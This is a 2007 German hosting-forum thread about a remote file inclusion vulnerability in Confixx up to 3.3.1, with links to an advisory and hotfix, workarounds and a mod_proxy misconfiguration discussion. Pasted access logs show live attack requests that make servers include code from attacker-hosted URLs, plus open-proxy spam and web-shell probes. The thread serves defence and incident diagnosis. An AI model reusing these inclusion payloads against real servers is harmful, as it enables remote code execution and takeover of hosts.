Sicherheitslücke in Confixx <=3.3.1

Plesk, Confixx, Froxlor, SysCP, SeCoTo, IspCP, etc.
Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Sicherheitslücke in Confixx <=3.3.1

Post by Roger Wilco » 2007-07-24 16:22

Und wieder einmal eine ausnutzbare Lücke in Confixx:

Confixx <= PRO 3.3.1 Remote File Inclusion Vulnerability

Der Fehler ermöglicht es Angreifern, auf dem Server beliebige Dateien einzubinden. Sofern PHP nicht entsprechend konfiguriert ist, können auch entfernte Dateien eingebunden werden. Die Kommandos werden im Kontext des Benutzers, unter dem die Confixx-Skripte laufen, ausgeführt.

Update:
Meldung auf dem Heise Newsticker: http://www.heise.de/newsticker/meldung/93627
Hotfix von SWSoft:
http://download1.swsoft.com/Confixx/sec ... _notes.txt
http://download1.swsoft.com/Confixx/sec ... tfix.pl.gz
Last edited by Roger Wilco on 2007-07-31 18:57, edited 1 time in total.

antondollmaier
Posts: 485
Joined: 2004-03-30 10:06

Re: Sicherheitslücke in Confixx <=3.3.1

Post by antondollmaier » 2007-07-24 17:21

ACHTUNG

Die ersten Exploits / Bots dafür sind bereits unterwegs!

Code: Select all

195.35.82.155 - - [24/Jul/2007:17:12:37 +0200] "GET /category/confixx/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805" 
195.35.82.155 - - [24/Jul/2007:17:12:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:12:38 +0200] "GET /category/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:13:18 +0200] "GET /2007/01/26/confixx-aktiviert/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
195.35.82.155 - - [24/Jul/2007:17:13:18 +0200] "GET /2007/01/26/admin/business_inc/saveserver.php?thisdir=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 200 14431 "-" "libwww-perl/5.805"
(auszugsweise, waren noch mehr IPs)


Die Treffer gingen hier auf ein Wordpress - scheint wohl, als ob wer via Google nach Confixx-Installationen sucht und die dann checken lässt ...

oxygen
Posts: 2138
Joined: 2002-12-15 00:10
Location: Bergheim

Re: Sicherheitslücke in Confixx <=3.3.1

Post by oxygen » 2007-07-24 18:56

Confixx stellt für den eigenen vhost standardmäßig ein:

allow_url_fopen off
open_basedir /var/www/confixx

Die Gefahr ist damit eher gering.

Edit Workaround: einfach Zugriff auf admin/business_inc/ verhindern, z.B. per .htaccess mit deny from all.

silent85
Posts: 117
Joined: 2006-10-22 16:02

Re: Sicherheitslücke in Confixx <=3.3.1

Post by silent85 » 2007-08-19 02:55

Genau das gleiche hatte ich, allerdings nicht auf die Saverserver vom Confixx sondern auf eine Phpkit HP.

Nun habe ich denn FIx Installiert

Code: Select all

./confixx_hotfix.pl
This is a security hotfix for vulnerability in admin/business_inc/saveserver.php
Should be applied to Confixx versions since 2.0.12 up to 3.3.1
It also should be applied every time you make upgrade to one of vulnerable versions
<press any key to continue or CTRL+C to cancel>

Nachdem die Leertaste nicht ging (Where is the Any Key??) bekam ich mit ENTER folgende ausgabe:

Code: Select all

Done.

Heisst das jetzt es ist erforgreich gefixt?


Und warum verdammt nochmal hab ich kein Any Key?? muss ich mir doch ne 102/103 tasten Tastatur bauen?? :roll:

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: Sicherheitslücke in Confixx <=3.3.1

Post by Roger Wilco » 2007-08-19 11:50

SilenT85 wrote:Heisst das jetzt es ist erforgreich gefixt?

Schau doch einfach mal in den Hotfix, was dieser eigentlich macht. ;)

silent85
Posts: 117
Joined: 2006-10-22 16:02

Re: Sicherheitslücke in Confixx <=3.3.1

Post by silent85 » 2007-08-19 17:49

Ups... Ja mein English ist nicht das beste. DOne heisst so viel "getan" laut Übersetzungstool. Dachte das heist so viel wie beenden oder beendet.

Hab mir das Script nun mal vom inhalt angeschaut und am ende sagt der immer Done. :oops:

Da hab ich wieder was gelernt... vor dem Posten einfach mal schauen mansche sachen verstehen sich von selbst.. Sry und danke für die Hilfe zur Selbsthilfe . :-)

Hey aber vieleicht hat jemand die gleiche Frage und ist so ein Noob wie ich 8O :roll: :-D

kochloeffel
Posts: 3
Joined: 2006-12-16 11:11

Re: Sicherheitslücke in Confixx <=3.3.1

Post by kochloeffel » 2007-12-11 17:40

Ich hätte dazu noch eine Frage. Hab ein betroffenes Confixx hier und jetzt den Hotfix installiert. Allerdings stehen bereits folgende Dinge in meinem Logfile:

127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:11:36 +0100] "GET /?option=com_performs&formid=2&Itemid=40/components/com_performs/performs.php%3fmosConfig_absolute_path=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:06 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:08 +0100] "GET /?option=com_performs&formid=2/components/com_performs/performs.php%3fmosConfig_absolute_path=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:16:56 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
kochloeffel.voellig-umsonst.net :: 82.149.177.62 - - [05/Dec/2007:19:20:13 +0100] "GET /media/468x60-2.gif HTTP/1.1" 404 1077 "http://www.linkhitlist.com/cgi/LHL_D.exe?SLHL&ListNo=39956817164" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:20:54 +0100] "GET / HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
80.86.82.17 :: 213.215.41.138 - - [05/Dec/2007:19:23:41 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:25:25 +0100] "GET /?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:31:32 +0100] "GET /479/index.php?sida=http://www.wsteam.net/include.c%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:56:02 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:56:02 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:19:57:38 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:01:24 +0100] "GET /?phpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:01:43 +0100] "GET /?t=5280&highlight=safe+mode/language/lang_english/lang_main_album.php%3fphpbb_root_path=http://crowdot.5gbfree.com/.ssh/id.txt%3f%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:28:56 +0100] "GET /?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:20:28:56 +0100] "GET /?spaw_root=http://usuarios.arnet.com.ar/larry123/safe.txt%3f HTTP/1.1" 404 1022 "-" "libwww-perl/5.803"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:21 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:21 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:23 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:23 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:24 +0100] "CONNECT 65.54.201.60:25 HTTP/1.0" 200 1046 "-" "-"
65.54.201.60 :: 65.54.241.68 - - [05/Dec/2007:20:47:24 +0100] "POST http://65.54.201.60:25/ HTTP/1.0" 200 1046 "-" "-"
127.0.0.1 :: 127.0.0.1 - - [05/Dec/2007:21:02:02 +0100] "GET /r57shell/version.php?version=13 HTTP/1.0" 404 1022 "-" "-"


und außerdem hatte ich 100GB Traffic in 2 Tagen, sonst hab ich ca. 12 - 17 GB im Monat. In den letzten beiden Tagen war der Traffic aber wieder normal. Es muss da schon irgendwas passiert sein. Ist die Sache jetzt mit der Installation des Hotfix ausgestanden oder sind weitere Maßnahmen nötig. Was empfehlt ihr?

Grüße Christian

User avatar
Joe User
Project Manager
Project Manager
Posts: 11137
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Sicherheitslücke in Confixx <=3.3.1

Post by Joe User » 2007-12-11 18:17

Die 404er und 400er sind harmlos, Sorgen sollten Dir die 200er mahen, denn diese zeigen, dass durch Dein fehlkonfiguriertes mod_proxy Spam verschickt werden kann.

kochloeffel
Posts: 3
Joined: 2006-12-16 11:11

Re: Sicherheitslücke in Confixx <=3.3.1

Post by kochloeffel » 2007-12-11 19:32

So sieht meine mod_proxy Konfiguration jetzt aus:

Code: Select all

<IfModule mod_proxy.c>

        #turning ProxyRequests on and allowing proxying from all may allow
        #spammers to use your proxy to send email.
               
   ProxyRequests Off

   <Proxy *>
      Order deny,allow
      Deny from all
      #Allow from .your_domain.com
   </Proxy>

   # Enable/disable the handling of HTTP/1.1 "Via:" headers.
   # ("Full" adds the server version; "Block" removes all outgoing Via: headers)
   # Set to one of: Off | On | Full | Block
   
   ProxyVia Off

   # To enable the cache as well, edit and uncomment the following lines:
   # (no cacheing without CacheRoot)
   
   CacheRoot "/var/cache/apache2/proxy"
   CacheSize 5
   CacheGcInterval 4
   CacheMaxExpire 24
   CacheLastModifiedFactor 0.1
   CacheDefaultExpire 1
   # Again, you probably should change this.
   #NoCache a_domain.com another_domain.edu joes.garage_sale.com

</IfModule>

ProxyVia stand vorhin noch auf On. Hatte die Standardeinstellung so übernommen.

Grüße Christian

Roger Wilco
Administrator
Administrator
Posts: 5924
Joined: 2004-05-23 12:53

Re: Sicherheitslücke in Confixx <=3.3.1

Post by Roger Wilco » 2007-12-11 21:00

Warum lädst du überhaupt mod_proxy, wenn du es nicht benötigst?

kochloeffel
Posts: 3
Joined: 2006-12-16 11:11

Re: Sicherheitslücke in Confixx <=3.3.1

Post by kochloeffel » 2007-12-12 15:26

Das war die Standardinstallation dieses webperoni Servers. Bin gar nicht auf die Idee gekommen da nachzusehen.

Grüße Christian